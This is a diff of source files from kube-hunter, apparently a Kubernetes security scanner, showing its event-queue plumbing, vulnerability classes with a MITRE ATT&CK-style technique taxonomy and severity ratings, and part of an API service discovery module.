||||
self.subscribe_event(event, hook=hook, predicate=predicate, is_register=is_register)
|
||||
return hook
|
||||
|
||||
return wrapper
|
||||
|
||||
def subscribe_many(self, events, hook=None, predicates=None, is_register=True):
|
||||
"""
|
||||
The Subscribe Many Decorator - For Multiple Registration,
|
||||
When your attack needs several prerequisites to exist in the cluster, You need to register for multiple events.
|
||||
Your hunter will execute once for every new combination of required events.
|
||||
For example:
|
||||
1. event A was published 3 times
|
||||
2. event B was published once.
|
||||
3. event B was published again
|
||||
Your hunter will execute 2 times:
|
||||
* (on step 2) with the newest version of A
|
||||
* (on step 3) with the newest version of A and newest version of B
|
||||
|
||||
@param events - List of event classes to subscribe to
|
||||
@param predicates - Optional: List of function that will be called with the published event as a parameter before trigger.
|
||||
If it's return value is False, the Hunter will not run (default=None).
|
||||
@param hook - Hunter class to register for (ignore when using as a decorator)
|
||||
"""
|
||||
|
||||
def wrapper(hook):
|
||||
self.subscribe_events(events, hook=hook, predicates=predicates, is_register=is_register)
|
||||
return hook
|
||||
|
||||
return wrapper
|
||||
|
||||
def subscribe_once(self, event, hook=None, predicate=None, is_register=True):
|
||||
"""
|
||||
The Subscribe Once Decorator - For Single Trigger Registration,
|
||||
Use this when you want your hunter to execute only in your entire program run
|
||||
wraps subscribe_event method
|
||||
|
||||
@param events - List of event classes to subscribe to
|
||||
@param predicates - Optional: List of function that will be called with the published event as a parameter before trigger.
|
||||
If it's return value is False, the Hunter will not run (default=None).
|
||||
@param hook - Hunter class to register for (ignore when using as a decorator)
|
||||
"""
|
||||
|
||||
def wrapper(hook):
|
||||
# installing a __new__ magic method on the hunter
|
||||
# which will remove the hunter from the list upon creation
|
||||
def __new__unsubscribe_self(self, cls):
|
||||
handler.hooks[event].remove((hook, predicate))
|
||||
return object.__new__(self)
|
||||
|
||||
hook.__new__ = __new__unsubscribe_self
|
||||
|
||||
self.subscribe_event(event, hook=hook, predicate=predicate, is_register=is_register)
|
||||
|
||||
return hook
|
||||
|
||||
return wrapper
|
||||
|
||||
def publish_event(self, event, caller=None):
|
||||
"""
|
||||
The Publish Event Method - For Publishing Events To Kube-Hunter's Queue
|
||||
"""
|
||||
# Document that the hunter published a vulnerability (if it's indeed a vulnerability)
|
||||
# For statistics options
|
||||
self._increase_vuln_count(event, caller)
|
||||
|
||||
# sets the event's parent to be it's publisher hunter.
|
||||
self._set_event_chain(event, caller)
|
||||
|
||||
# applying filters on the event, before publishing it to subscribers.
|
||||
# if filter returned None, not proceeding to publish
|
||||
event = self.apply_filters(event)
|
||||
if event:
|
||||
# If event was rewritten, make sure it's linked again
|
||||
self._set_event_chain(event, caller)
|
||||
|
||||
# Regular Hunter registrations - publish logic
|
||||
# Here we iterate over all the registered-to events:
|
||||
for hooked_event in self.hooks.keys():
|
||||
# We check if the event we want to publish is an inherited class of the current registered-to iterated event
|
||||
# Meaning - if this is a relevant event:
|
||||
if hooked_event in event.__class__.__mro__:
|
||||
# If so, we want to publish to all registerd hunters.
|
||||
for hook, predicate in self.hooks[hooked_event]:
|
||||
if predicate and not predicate(event):
|
||||
continue
|
||||
|
||||
self.put(hook(event))
|
||||
logger.debug(f"Event {event.__class__} got published to hunter - {hook} with {event}")
|
||||
|
||||
# Multiple Hunter registrations - publish logic
|
||||
# Here we iterate over all the registered-to events:
|
||||
for hooked_event in self.multi_hooks.keys():
|
||||
# We check if the event we want to publish is an inherited class of the current registered-to iterated event
|
||||
# Meaning - if this is a relevant event:
|
||||
if hooked_event in event.__class__.__mro__:
|
||||
# now we iterate over the corresponding registered hunters.
|
||||
for hook, predicate in self.multi_hooks[hooked_event]:
|
||||
if predicate and not predicate(event):
|
||||
continue
|
||||
|
||||
self._update_multi_hooks(hook, event)
|
||||
|
||||
if self._is_all_fulfilled_for_hunter(hook):
|
||||
events_container = MultipleEventsContainer(self._get_latest_events_from_multi_hooks(hook))
|
||||
self.put(hook(events_container))
|
||||
logger.debug(
|
||||
f"Multiple subscription requirements were met for hunter {hook}. events container was \
|
||||
published with {self.hook_fulfilled_deps[hook].keys()}"
|
||||
)
|
||||
|
||||
"""
|
||||
######################################################
|
||||
+ ---------------- Private Methods ----------------- +
|
||||
+ ---------------- (Backend Logic) ----------------- +
|
||||
######################################################
|
||||
"""
|
||||
|
||||
def _get_latest_events_from_multi_hooks(self, hook):
|
||||
"""
|
||||
Iterates over fulfilled deps for the hunter, and fetching the latest appended events from history
|
||||
"""
|
||||
latest_events = list()
|
||||
for event_class in self.hook_fulfilled_deps[hook].keys():
|
||||
latest_events.append(self.hook_fulfilled_deps[hook][event_class][-1])
|
||||
return latest_events
|
||||
|
||||
def _update_multi_hooks(self, hook, event):
|
||||
"""
|
||||
Updates published events in the multi hooks fulfilled store.
|
||||
"""
|
||||
self.hook_fulfilled_deps[hook][event.__class__].append(event)
|
||||
|
||||
def _is_all_fulfilled_for_hunter(self, hook):
|
||||
"""
|
||||
Returns true for multi hook fulfilled, else oterwise
|
||||
"""
|
||||
# Check if the first dimension already contains all necessary event classes
|
||||
return len(self.hook_fulfilled_deps[hook].keys()) == len(self.hook_dependencies[hook])
|
||||
|
||||
def _set_event_chain(self, event, caller):
|
||||
"""
|
||||
Sets' events attribute chain.
|
||||
In here we link the event with it's publisher (Hunter),
|
||||
so in the next hunter that catches this event, we could access the previous one's attributes.
|
||||
|
||||
@param event: the event object to be chained
|
||||
@param caller: the Hunter object that published this event.
|
||||
"""
|
||||
if caller:
|
||||
event.previous = caller.event
|
||||
event.hunter = caller.__class__
|
||||
|
||||
def _register_hunters(self, hook=None):
|
||||
"""
|
||||
This method is called when a Hunter registers itself to the handler.
|
||||
this is done in order to track and correctly configure the current run of the program.
|
||||
|
||||
passive_hunters, active_hunters, all_hunters
|
||||
"""
|
||||
config = get_config()
|
||||
if ActiveHunter in hook.__mro__:
|
||||
if not config.active:
|
||||
return False
|
||||
else:
|
||||
self.active_hunters[hook] = hook.__doc__
|
||||
elif HunterBase in hook.__mro__:
|
||||
self.passive_hunters[hook] = hook.__doc__
|
||||
|
||||
if HunterBase in hook.__mro__:
|
||||
self.all_hunters[hook] = hook.__doc__
|
||||
|
||||
return True
|
||||
|
||||
def _register_filter(self, event, hook=None, predicate=None):
|
||||
if hook not in self.filters[event]:
|
||||
self.filters[event].append((hook, predicate))
|
||||
logging.debug("{} filter subscribed to {}".format(hook, event))
|
||||
|
||||
def _register_hook(self, event, hook=None, predicate=None):
|
||||
if hook not in self.hooks[event]:
|
||||
self.hooks[event].append((hook, predicate))
|
||||
logging.debug("{} subscribed to {}".format(hook, event))
|
||||
|
||||
def allowed_for_custom_registration(self, target_hunter):
|
||||
"""
|
||||
Check if the partial input list contains the hunter we are about to register for events
|
||||
If hunter is considered a Core hunter as specified in `config.core_hunters` we allow it anyway
|
||||
|
||||
Returns true if:
|
||||
1. partial hunt is disabled
|
||||
2. partial hunt is enabled and hunter is in core hunter class
|
||||
3. partial hunt is enabled and hunter is specified in config.partial
|
||||
|
||||
@param target_hunter: hunter class for registration check
|
||||
"""
|
||||
config = get_config()
|
||||
if not config.custom:
|
||||
return True
|
||||
|
||||
hunter_class_name = target_hunter.__name__
|
||||
if hunter_class_name in config.core_hunters or hunter_class_name in config.custom:
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
def subscribe_event(self, event, hook=None, predicate=None, is_register=True):
|
||||
if not is_register:
|
||||
return
|
||||
if not self.allowed_for_custom_registration(hook):
|
||||
return
|
||||
if not self._register_hunters(hook):
|
||||
return
|
||||
|
||||
# registering filters
|
||||
if EventFilterBase in hook.__mro__:
|
||||
self._register_filter(event, hook, predicate)
|
||||
# registering hunters
|
||||
else:
|
||||
self._register_hook(event, hook, predicate)
|
||||
|
||||
def subscribe_events(self, events, hook=None, predicates=None, is_register=True):
|
||||
if not is_register:
|
||||
return
|
||||
if not self.allowed_for_custom_registration(hook):
|
||||
return
|
||||
if not self._register_hunters(hook):
|
||||
return
|
||||
|
||||
if predicates is None:
|
||||
predicates = [None] * len(events)
|
||||
|
||||
# registering filters.
|
||||
if EventFilterBase in hook.__mro__:
|
||||
for event, predicate in zip(events, predicates):
|
||||
self._register_filter(event, hook, predicate)
|
||||
# registering hunters.
|
||||
else:
|
||||
for event, predicate in zip(events, predicates):
|
||||
self.multi_hooks[event].append((hook, predicate))
|
||||
|
||||
self.hook_dependencies[hook] = frozenset(events)
|
||||
|
||||
def apply_filters(self, event):
|
||||
# if filters are subscribed, apply them on the event
|
||||
for hooked_event in self.filters.keys():
|
||||
if hooked_event in event.__class__.__mro__:
|
||||
for filter_hook, predicate in self.filters[hooked_event]:
|
||||
if predicate and not predicate(event):
|
||||
continue
|
||||
|
||||
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
|
||||
event = filter_hook(event).execute()
|
||||
# if filter decided to remove event, returning None
|
||||
if not event:
|
||||
return None
|
||||
return event
|
||||
|
||||
def _increase_vuln_count(self, event, caller):
|
||||
config = get_config()
|
||||
if config.statistics and caller:
|
||||
if Vulnerability in event.__class__.__mro__:
|
||||
caller.__class__.publishedVulnerabilities += 1
|
||||
|
||||
# executes callbacks on dedicated thread as a daemon
|
||||
def worker(self):
|
||||
while self.running:
|
||||
try:
|
||||
hook = self.get()
|
||||
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
|
||||
hook.execute()
|
||||
except Exception as ex:
|
||||
logger.debug(ex, exc_info=True)
|
||||
finally:
|
||||
self.task_done()
|
||||
logger.debug("closing thread...")
|
||||
|
||||
def notifier(self):
|
||||
time.sleep(2)
|
||||
# should consider locking on unfinished_tasks
|
||||
while self.unfinished_tasks > 0:
|
||||
logger.debug(f"{self.unfinished_tasks} tasks left")
|
||||
time.sleep(3)
|
||||
if self.unfinished_tasks == 1:
|
||||
logger.debug("final hook is hanging")
|
||||
|
||||
# stops execution of all daemons
|
||||
def free(self):
|
||||
self.running = False
|
||||
with self.mutex:
|
||||
self.queue.clear()
|
||||
|
||||
|
||||
config = get_config()
|
||||
handler = EventQueue(config.num_worker_threads)
|
||||
267
kube_hunter/core/events/types.py
Normal file
267
kube_hunter/core/events/types.py
Normal file
@@ -0,0 +1,267 @@
|
||||
import logging
|
||||
import threading
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.types import KubernetesCluster
|
||||
from kube_hunter.core.types.vulnerabilities import (
|
||||
GeneralSensitiveInformationTechnique,
|
||||
ExposedSensitiveInterfacesTechnique,
|
||||
MountServicePrincipalTechnique,
|
||||
ListK8sSecretsTechnique,
|
||||
AccessContainerServiceAccountTechnique,
|
||||
AccessK8sApiServerTechnique,
|
||||
AccessKubeletAPITechnique,
|
||||
AccessK8sDashboardTechnique,
|
||||
InstanceMetadataApiTechnique,
|
||||
ExecIntoContainerTechnique,
|
||||
SidecarInjectionTechnique,
|
||||
NewContainerTechnique,
|
||||
GeneralPersistenceTechnique,
|
||||
HostPathMountPrivilegeEscalationTechnique,
|
||||
PrivilegedContainerTechnique,
|
||||
ClusterAdminBindingTechnique,
|
||||
ARPPoisoningTechnique,
|
||||
CoreDNSPoisoningTechnique,
|
||||
DataDestructionTechnique,
|
||||
GeneralDefenseEvasionTechnique,
|
||||
ConnectFromProxyServerTechnique,
|
||||
CVERemoteCodeExecutionCategory,
|
||||
CVEPrivilegeEscalationCategory,
|
||||
CVEDenialOfServiceTechnique,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class EventFilterBase:
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
# Returns self.event as default.
|
||||
# If changes has been made, should return the new event that's been altered
|
||||
# Return None to indicate the event should be discarded
|
||||
def execute(self):
|
||||
return self.event
|
||||
|
||||
|
||||
class Event:
|
||||
def __init__(self):
|
||||
self.previous = None
|
||||
self.hunter = None
|
||||
|
||||
# newest attribute gets selected first
|
||||
def __getattr__(self, name):
|
||||
if name == "previous":
|
||||
return None
|
||||
for event in self.history:
|
||||
if name in event.__dict__:
|
||||
return event.__dict__[name]
|
||||
|
||||
# Event's logical location to be used mainly for reports.
|
||||
# If event don't implement it check previous event
|
||||
# This is because events are composed (previous -> previous ...)
|
||||
# and not inherited
|
||||
def location(self):
|
||||
location = None
|
||||
if self.previous:
|
||||
location = self.previous.location()
|
||||
|
||||
return location
|
||||
|
||||
# returns the event history ordered from newest to oldest
|
||||
@property
|
||||
def history(self):
|
||||
previous, history = self.previous, list()
|
||||
while previous:
|
||||
history.append(previous)
|
||||
previous = previous.previous
|
||||
return history
|
||||
|
||||
|
||||
class MultipleEventsContainer(Event):
|
||||
"""
|
||||
This is the class of the object an hunter will get if he was registered to multiple events.
|
||||
"""
|
||||
|
||||
def __init__(self, events):
|
||||
self.events = events
|
||||
|
||||
def get_by_class(self, event_class):
|
||||
for event in self.events:
|
||||
if event.__class__ == event_class:
|
||||
return event
|
||||
|
||||
|
||||
class Service:
|
||||
def __init__(self, name, path="", secure=True):
|
||||
self.name = name
|
||||
self.secure = secure
|
||||
self.path = path
|
||||
self.role = "Node"
|
||||
|
||||
# if a service account token was specified, we load it to the Service class
|
||||
# We load it here because generally all kuberentes services could be authenticated with the token
|
||||
config = get_config()
|
||||
if config.service_account_token:
|
||||
self.auth_token = config.service_account_token
|
||||
|
||||
def get_name(self):
|
||||
return self.name
|
||||
|
||||
def get_path(self):
|
||||
return "/" + self.path if self.path else ""
|
||||
|
||||
def explain(self):
|
||||
return self.__doc__
|
||||
|
||||
|
||||
class Vulnerability:
|
||||
severity = dict(
|
||||
{
|
||||
GeneralSensitiveInformationTechnique: "low",
|
||||
ExposedSensitiveInterfacesTechnique: "high",
|
||||
MountServicePrincipalTechnique: "high",
|
||||
ListK8sSecretsTechnique: "high",
|
||||
AccessContainerServiceAccountTechnique: "low",
|
||||
AccessK8sApiServerTechnique: "medium",
|
||||
AccessKubeletAPITechnique: "medium",
|
||||
AccessK8sDashboardTechnique: "medium",
|
||||
InstanceMetadataApiTechnique: "high",
|
||||
ExecIntoContainerTechnique: "high",
|
||||
SidecarInjectionTechnique: "high",
|
||||
NewContainerTechnique: "high",
|
||||
GeneralPersistenceTechnique: "high",
|
||||
HostPathMountPrivilegeEscalationTechnique: "high",
|
||||
PrivilegedContainerTechnique: "high",
|
||||
ClusterAdminBindingTechnique: "high",
|
||||
ARPPoisoningTechnique: "medium",
|
||||
CoreDNSPoisoningTechnique: "high",
|
||||
DataDestructionTechnique: "high",
|
||||
GeneralDefenseEvasionTechnique: "high",
|
||||
ConnectFromProxyServerTechnique: "low",
|
||||
CVERemoteCodeExecutionCategory: "high",
|
||||
CVEPrivilegeEscalationCategory: "high",
|
||||
CVEDenialOfServiceTechnique: "medium",
|
||||
}
|
||||
)
|
||||
|
||||
# TODO: make vid mandatory once migration is done
|
||||
def __init__(self, component, name, category=None, vid="None"):
|
||||
self.vid = vid
|
||||
self.component = component
|
||||
self.category = category
|
||||
self.name = name
|
||||
self.evidence = ""
|
||||
self.role = "Node"
|
||||
|
||||
def get_vid(self):
|
||||
return self.vid
|
||||
|
||||
def get_category(self):
|
||||
if self.category:
|
||||
return self.category.name
|
||||
|
||||
def get_name(self):
|
||||
return self.name
|
||||
|
||||
def explain(self):
|
||||
return self.__doc__
|
||||
|
||||
def get_severity(self):
|
||||
return self.severity.get(self.category, "low")
|
||||
|
||||
|
||||
event_id_count_lock = threading.Lock()
|
||||
event_id_count = 0
|
||||
|
||||
|
||||
class NewHostEvent(Event):
|
||||
def __init__(self, host, cloud=None):
|
||||
global event_id_count
|
||||
self.host = host
|
||||
self.cloud_type = cloud
|
||||
|
||||
with event_id_count_lock:
|
||||
self.event_id = event_id_count
|
||||
event_id_count += 1
|
||||
|
||||
@property
|
||||
def cloud(self):
|
||||
if not self.cloud_type:
|
||||
self.cloud_type = self.get_cloud()
|
||||
return self.cloud_type
|
||||
|
||||
def get_cloud(self):
|
||||
config = get_config()
|
||||
try:
|
||||
logger.debug("Checking whether the cluster is deployed on azure's cloud")
|
||||
# Leverage 3rd tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
|
||||
result = requests.get(
|
||||
f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
return result["cloud"] or "NoCloud"
|
||||
except requests.ConnectionError:
|
||||
logger.info("Failed to connect cloud type service", exc_info=True)
|
||||
except Exception:
|
||||
logger.warning(f"Unable to check cloud of {self.host}", exc_info=True)
|
||||
return "NoCloud"
|
||||
|
||||
def __str__(self):
|
||||
return str(self.host)
|
||||
|
||||
# Event's logical location to be used mainly for reports.
|
||||
def location(self):
|
||||
return str(self.host)
|
||||
|
||||
|
||||
class OpenPortEvent(Event):
|
||||
def __init__(self, port):
|
||||
self.port = port
|
||||
|
||||
def __str__(self):
|
||||
return str(self.port)
|
||||
|
||||
# Event's logical location to be used mainly for reports.
|
||||
def location(self):
|
||||
if self.host:
|
||||
location = str(self.host) + ":" + str(self.port)
|
||||
else:
|
||||
location = str(self.port)
|
||||
return location
|
||||
|
||||
|
||||
class HuntFinished(Event):
|
||||
pass
|
||||
|
||||
|
||||
class HuntStarted(Event):
|
||||
pass
|
||||
|
||||
|
||||
class ReportDispatched(Event):
|
||||
pass
|
||||
|
||||
|
||||
class K8sVersionDisclosure(Vulnerability, Event):
|
||||
"""The kubernetes version could be obtained from the {} endpoint"""
|
||||
|
||||
def __init__(self, version, from_endpoint, extra_info="", category=None):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"K8s Version Disclosure",
|
||||
category=ExposedSensitiveInterfacesTechnique,
|
||||
vid="KHV002",
|
||||
)
|
||||
self.version = version
|
||||
self.from_endpoint = from_endpoint
|
||||
self.extra_info = extra_info
|
||||
self.evidence = version
|
||||
# depending from where the version came from, we might want to also override the category
|
||||
if category:
|
||||
self.category = category
|
||||
|
||||
def explain(self):
|
||||
return self.__doc__.format(self.from_endpoint) + self.extra_info
|
||||
4
kube_hunter/core/types/__init__.py
Normal file
4
kube_hunter/core/types/__init__.py
Normal file
@@ -0,0 +1,4 @@
|
||||
# flake8: noqa: E402
|
||||
from .hunters import *
|
||||
from .components import *
|
||||
from .vulnerabilities import *
|
||||
28
kube_hunter/core/types/components.py
Normal file
28
kube_hunter/core/types/components.py
Normal file
@@ -0,0 +1,28 @@
|
||||
class KubernetesCluster:
|
||||
"""Kubernetes Cluster"""
|
||||
|
||||
name = "Kubernetes Cluster"
|
||||
|
||||
|
||||
class KubectlClient:
|
||||
"""The kubectl client binary is used by the user to interact with the cluster"""
|
||||
|
||||
name = "Kubectl Client"
|
||||
|
||||
|
||||
class Kubelet(KubernetesCluster):
|
||||
"""The kubelet is the primary "node agent" that runs on each node"""
|
||||
|
||||
name = "Kubelet"
|
||||
|
||||
|
||||
class AWS(KubernetesCluster):
|
||||
"""AWS Cluster"""
|
||||
|
||||
name = "AWS"
|
||||
|
||||
|
||||
class Azure(KubernetesCluster):
|
||||
"""Azure Cluster"""
|
||||
|
||||
name = "Azure"
|
||||
36
kube_hunter/core/types/hunters.py
Normal file
36
kube_hunter/core/types/hunters.py
Normal file
@@ -0,0 +1,36 @@
|
||||
class HunterBase:
|
||||
publishedVulnerabilities = 0
|
||||
|
||||
@staticmethod
|
||||
def parse_docs(docs):
|
||||
"""returns tuple of (name, docs)"""
|
||||
if not docs:
|
||||
return __name__, "<no documentation>"
|
||||
docs = docs.strip().split("\n")
|
||||
for i, line in enumerate(docs):
|
||||
docs[i] = line.strip()
|
||||
return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>"
|
||||
|
||||
@classmethod
|
||||
def get_name(cls):
|
||||
name, _ = cls.parse_docs(cls.__doc__)
|
||||
return name
|
||||
|
||||
def publish_event(self, event):
|
||||
# Import here to avoid circular import from events package.
|
||||
# imports are cached in python so this should not affect runtime
|
||||
from ..events.event_handler import handler # noqa
|
||||
|
||||
handler.publish_event(event, caller=self)
|
||||
|
||||
|
||||
class ActiveHunter(HunterBase):
|
||||
pass
|
||||
|
||||
|
||||
class Hunter(HunterBase):
|
||||
pass
|
||||
|
||||
|
||||
class Discovery(HunterBase):
|
||||
pass
|
||||
188
kube_hunter/core/types/vulnerabilities.py
Normal file
188
kube_hunter/core/types/vulnerabilities.py
Normal file
@@ -0,0 +1,188 @@
|
||||
"""
|
||||
Vulnerabilities are divided into 2 main categories.
|
||||
|
||||
MITRE Category
|
||||
--------------
|
||||
Vulnerability that correlates to a method in the official MITRE ATT&CK matrix for kubernetes
|
||||
|
||||
CVE Category
|
||||
-------------
|
||||
"General" category definition. The category is usually determined by the severity of the CVE
|
||||
"""
|
||||
|
||||
|
||||
class MITRECategory:
|
||||
@classmethod
|
||||
def get_name(cls):
|
||||
"""
|
||||
Returns the full name of MITRE technique: <MITRE CATEGORY> // <MITRE TECHNIQUE>
|
||||
Should only be used on a direct technique class at the end of the MITRE inheritance chain.
|
||||
|
||||
Example inheritance:
|
||||
MITRECategory -> InitialAccessCategory -> ExposedSensitiveInterfacesTechnique
|
||||
"""
|
||||
inheritance_chain = cls.__mro__
|
||||
if len(inheritance_chain) >= 4:
|
||||
# -3 == index of mitreCategory class. (object class is first)
|
||||
mitre_category_class = inheritance_chain[-3]
|
||||
return f"{mitre_category_class.name} // {cls.name}"
|
||||
|
||||
|
||||
class CVECategory:
|
||||
@classmethod
|
||||
def get_name(cls):
|
||||
"""
|
||||
Returns the full name of the category: CVE // <CVE Category name>
|
||||
"""
|
||||
return f"CVE // {cls.name}"
|
||||
|
||||
|
||||
"""
|
||||
MITRE ATT&CK Technique Categories
|
||||
"""
|
||||
|
||||
|
||||
class InitialAccessCategory(MITRECategory):
|
||||
name = "Initial Access"
|
||||
|
||||
|
||||
class ExecutionCategory(MITRECategory):
|
||||
name = "Execution"
|
||||
|
||||
|
||||
class PersistenceCategory(MITRECategory):
|
||||
name = "Persistence"
|
||||
|
||||
|
||||
class PrivilegeEscalationCategory(MITRECategory):
|
||||
name = "Privilege Escalation"
|
||||
|
||||
|
||||
class DefenseEvasionCategory(MITRECategory):
|
||||
name = "Defense Evasion"
|
||||
|
||||
|
||||
class CredentialAccessCategory(MITRECategory):
|
||||
name = "Credential Access"
|
||||
|
||||
|
||||
class DiscoveryCategory(MITRECategory):
|
||||
name = "Discovery"
|
||||
|
||||
|
||||
class LateralMovementCategory(MITRECategory):
|
||||
name = "Lateral Movement"
|
||||
|
||||
|
||||
class CollectionCategory(MITRECategory):
|
||||
name = "Collection"
|
||||
|
||||
|
||||
class ImpactCategory(MITRECategory):
|
||||
name = "Impact"
|
||||
|
||||
|
||||
"""
|
||||
MITRE ATT&CK Techniques
|
||||
"""
|
||||
|
||||
|
||||
class GeneralSensitiveInformationTechnique(InitialAccessCategory):
|
||||
name = "General Sensitive Information"
|
||||
|
||||
|
||||
class ExposedSensitiveInterfacesTechnique(InitialAccessCategory):
|
||||
name = "Exposed sensitive interfaces"
|
||||
|
||||
|
||||
class MountServicePrincipalTechnique(CredentialAccessCategory):
|
||||
name = "Mount service principal"
|
||||
|
||||
|
||||
class ListK8sSecretsTechnique(CredentialAccessCategory):
|
||||
name = "List K8S secrets"
|
||||
|
||||
|
||||
class AccessContainerServiceAccountTechnique(CredentialAccessCategory):
|
||||
name = "Access container service account"
|
||||
|
||||
|
||||
class AccessK8sApiServerTechnique(DiscoveryCategory):
|
||||
name = "Access the K8S API Server"
|
||||
|
||||
|
||||
class AccessKubeletAPITechnique(DiscoveryCategory):
|
||||
name = "Access Kubelet API"
|
||||
|
||||
|
||||
class AccessK8sDashboardTechnique(DiscoveryCategory):
|
||||
name = "Access Kubernetes Dashboard"
|
||||
|
||||
|
||||
class InstanceMetadataApiTechnique(DiscoveryCategory):
|
||||
name = "Instance Metadata API"
|
||||
|
||||
|
||||
class ExecIntoContainerTechnique(ExecutionCategory):
|
||||
name = "Exec into container"
|
||||
|
||||
|
||||
class SidecarInjectionTechnique(ExecutionCategory):
|
||||
name = "Sidecar injection"
|
||||
|
||||
|
||||
class NewContainerTechnique(ExecutionCategory):
|
||||
name = "New container"
|
||||
|
||||
|
||||
class GeneralPersistenceTechnique(PersistenceCategory):
|
||||
name = "General Peristence"
|
||||
|
||||
|
||||
class HostPathMountPrivilegeEscalationTechnique(PrivilegeEscalationCategory):
|
||||
name = "hostPath mount"
|
||||
|
||||
|
||||
class PrivilegedContainerTechnique(PrivilegeEscalationCategory):
|
||||
name = "Privileged container"
|
||||
|
||||
|
||||
class ClusterAdminBindingTechnique(PrivilegeEscalationCategory):
|
||||
name = "Cluser-admin binding"
|
||||
|
||||
|
||||
class ARPPoisoningTechnique(LateralMovementCategory):
|
||||
name = "ARP poisoning and IP spoofing"
|
||||
|
||||
|
||||
class CoreDNSPoisoningTechnique(LateralMovementCategory):
|
||||
name = "CoreDNS poisoning"
|
||||
|
||||
|
||||
class DataDestructionTechnique(ImpactCategory):
|
||||
name = "Data Destruction"
|
||||
|
||||
|
||||
class GeneralDefenseEvasionTechnique(DefenseEvasionCategory):
|
||||
name = "General Defense Evasion"
|
||||
|
||||
|
||||
class ConnectFromProxyServerTechnique(DefenseEvasionCategory):
|
||||
name = "Connect from Proxy server"
|
||||
|
||||
|
||||
"""
|
||||
CVE Categories
|
||||
"""
|
||||
|
||||
|
||||
class CVERemoteCodeExecutionCategory(CVECategory):
|
||||
name = "Remote Code Execution (CVE)"
|
||||
|
||||
|
||||
class CVEPrivilegeEscalationCategory(CVECategory):
|
||||
name = "Privilege Escalation (CVE)"
|
||||
|
||||
|
||||
class CVEDenialOfServiceTechnique(CVECategory):
|
||||
name = "Denial Of Service (CVE)"
|
||||
@@ -1,3 +1,4 @@
|
||||
# flake8: noqa: E402
|
||||
from . import report
|
||||
from . import discovery
|
||||
from . import hunting
|
||||
11
kube_hunter/modules/discovery/__init__.py
Normal file
11
kube_hunter/modules/discovery/__init__.py
Normal file
@@ -0,0 +1,11 @@
|
||||
# flake8: noqa: E402
|
||||
from . import (
|
||||
apiserver,
|
||||
dashboard,
|
||||
etcd,
|
||||
hosts,
|
||||
kubectl,
|
||||
kubelet,
|
||||
ports,
|
||||
proxy,
|
||||
)
|
||||
@@ -1,15 +1,20 @@
|
||||
import json
|
||||
import requests
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from ...core.types import Discovery
|
||||
from ...core.events import handler
|
||||
from ...core.events.types import OpenPortEvent, Service, Event, EventFilterBase
|
||||
from kube_hunter.core.types import Discovery
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
|
||||
KNOWN_API_PORTS = [443, 6443, 8080]
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class K8sApiService(Service, Event):
|
||||
"""A Kubernetes API service"""
|
||||
|
||||
def __init__(self, protocol="https"):
|
||||
Service.__init__(self, name="Unrecognized K8s API")
|
||||
self.protocol = protocol
|
||||
@@ -17,12 +22,15 @@ class K8sApiService(Service, Event):
|
||||
|
||||
class ApiServer(Service, Event):
|
||||
"""The API server is in charge of all operations on the cluster."""
|
||||
|
||||
def __init__(self):
|
||||
Service.__init__(self, name="API Server")
|
||||
self.protocol = "https"
|
||||
|
||||
|
||||
|
||||
class MetricsServer(Service, Event):
|
||||
"""The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server."""
|
||||
"""The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server"""
|
||||
|
||||
def __init__(self):
|
||||
Service.__init__(self, name="Metrics Server")
|
||||
self.protocol = "https"
|
||||
@@ -35,43 +43,46 @@ class ApiServiceDiscovery(Discovery):
|
||||
"""API Service Discovery
|
||||
Checks for the existence of K8s API Services
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.session = requests.Session()
|
||||
self.session.verify = False
|
||||
|
||||
|
||||
def execute(self):
|
||||
logging.debug("Attempting to discover an API service on {}:{}".format(self.event.host, self.event.port))
|
||||
logger.debug(f"Attempting to discover an API service on {self.event.host}:{self.event.port}")
|
||||
protocols = ["http", "https"]
|
||||
for protocol in protocols:
|
||||
if self.has_api_behaviour(protocol):
|
||||
self.publish_event(K8sApiService(protocol))
|
||||
|
||||
def has_api_behaviour(self, protocol):
|
||||
config = get_config()
|
||||
try:
|
||||
r = self.session.get("{}://{}:{}".format(protocol, self.event.host, self.event.port))
|
||||
if ('k8s' in r.text) or ('"code"' in r.text and r.status_code != 200):
|
||||
r = self.session.get(f"{protocol}://{self.event.host}:{self.event.port}", timeout=config.network_timeout)
|
||||
if ("k8s" in r.text) or ('"code"' in r.text and r.status_code != 200):
|
||||
return True
|
||||
except requests.exceptions.SSLError:
|
||||
logging.debug("{} protocol not accepted on {}:{}".format(protocol, self.event.host, self.event.port))
|
||||
except Exception as e:
|
||||
logging.debug("{} on {}:{}".format(e, self.event.host, self.event.port))
|
||||
logger.debug(f"{[protocol]} protocol not accepted on {self.event.host}:{self.event.port}")
|
||||
except Exception:
|
||||
logger.debug(f"Failed probing {self.event.host}:{self.event.port}", exc_info=True)
|
||||
|
||||
|
||||
# Acts as a Filter for services, In the case that we can classify the API,
|
||||
# We swap the filtered event with a new corresponding Service to next be published
|
||||
# The classification can be regarding the context of the execution,
|
||||
# Currently we classify: Metrics Server and Api Server
|
||||
# If running as a pod:
|
||||
# If running as a pod:
|
||||
# We know the Api server IP, so we can classify easily
|
||||
# If not:
|
||||
# We determine by accessing the /version on the service.
|
||||
# If not:
|
||||
# We determine by accessing the /version on the service.
|
||||
# Api Server will contain a major version field, while the Metrics will not
|
||||
@handler.subscribe(K8sApiService)
|
||||
class ApiServiceClassify(EventFilterBase):
|
||||
